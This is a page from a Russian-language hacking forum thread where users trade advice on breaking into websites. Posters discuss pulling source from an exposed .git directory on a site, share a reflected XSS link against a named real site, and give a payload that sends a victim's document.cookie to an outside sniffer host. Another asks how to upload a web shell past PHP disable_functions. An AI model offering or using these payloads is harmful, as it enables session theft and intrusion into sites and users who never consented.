HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 87 из 296 « Первая < 3777 83 84 85 86 87 88 89 90 91 97137187 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #861  
Старый 23.11.2015, 05:15
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
Цитата:
Сообщение от RWD  
RWD said:

нашел сайт, при переходе в .git/index скачивается файл
как заюзать? спасибо
склонируйте репозиторий, это же банально и легко гуглится
 
Ответить с цитированием

  #862  
Старый 23.11.2015, 11:57
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию
Цитата:
Сообщение от Strilo4ka  
Strilo4ka said:

склонируйте репозиторий, это же банально и легко гуглится
пробовал, но похоже что в сам .git

Forbidden

You don't have permission to access /.git/ on this server.

, а если добавить /index, то качается файл index размером чуть больше 450кб
 
Ответить с цитированием

  #863  
Старый 23.11.2015, 12:00
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию
Цитата:
Сообщение от RWD  
RWD said:

пробовал, но похоже что в сам .git
Forbidden
You don't have permission to access /.git/ on this server.
, а если добавить /index, то качается файл index размером чуть больше 450кб
https://rdot.org/forum/showpost.php?...5&postcount=81
 
Ответить с цитированием

  #864  
Старый 23.11.2015, 22:12
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию
Цитата:
Сообщение от Strilo4ka  
вообщем загрузил файл в git репозиторий, получил список, затем git checkout db-config.php и ничего не происходит. Все команды делаю в репозитории.

Git выдаст сообщение об ошибке, т.к. запрашиваемый объект отсутствует в локальном репозитории этого не происходит

Что я делаю не так?
 
Ответить с цитированием

  #865  
Старый 24.11.2015, 04:31
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию
Цитата:
Сообщение от RWD  
RWD said:

вообщем загрузил файл в git репозиторий, получил список, затем git checkout db-config.php и ничего не происходит. Все команды делаю в репозитории.
Git выдаст сообщение об ошибке, т.к. запрашиваемый объект отсутствует в локальном репозитории этого не происходит

Что я делаю не так?
все понятно, но это работает только если есть доступ к git репозитории, а здесь только к файлу index
 
Ответить с цитированием

  #866  
Старый 24.11.2015, 09:15
Hussar
Guest
Сообщений: n/a
Провел на форуме:
1355

Репутация: 0
По умолчанию
Скиньте примеры ссылки, которая отправляется жертве при эксплуатации XSS. Желательно с document.location ... Тысячу раз перепробовал, все никак.
 
Ответить с цитированием

  #867  
Старый 24.11.2015, 11:47
AlexG
Guest
Сообщений: n/a
Провел на форуме:
11344

Репутация: 5
По умолчанию
Цитата:
Сообщение от Hussar  
Hussar said:

Скиньте примеры ссылки, которая отправляется жертве при эксплуатации XSS. Желательно с document.location ... Тысячу раз перепробовал, все никак.
Если я правильно понял

Код:
Code:
http://www.alfa.com.tw/search.php?keyword=">document.location.href='http://google.com'
Проверял только в тор-браузере. Работает.
 
Ответить с цитированием

  #868  
Старый 24.11.2015, 13:22
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от Hussar  
Hussar said:

Скиньте примеры ссылки, которая отправляется жертве при эксплуатации XSS. Желательно с document.location ... Тысячу раз перепробовал, все никак.
может вы имеете ввиду window.location? какая атака? кража кук?

window.location = "http://sniffer.ru/?"+document.cookie
 
Ответить с цитированием

  #869  
Старый 25.11.2015, 21:21
sysjuk
Guest
Сообщений: n/a
Провел на форуме:
69527

Репутация: 5
По умолчанию
disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pc ntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,p cntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcn tl_signal,pcntl_signal_dispatch,pcntl_get_last_err or,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaiti nfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriorit y,pcntl_setpriority, pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pc ntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,p cntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcn tl_signal,pcntl_signal_dispatch,pcntl_get_last_err or,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaiti nfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriorit y,pcntl_setpriority,

Какие варианты могут быть залития шелла, ипб fopen не пашет)
 
Ответить с цитированием

  #870  
Старый 25.11.2015, 21:24
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
У вас нет в списке fopen.
 
Ответить с цитированием
Ответ
Страница 87 из 296 « Первая < 3777 83 84 85 86 87 88 89 90 91 97137187 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ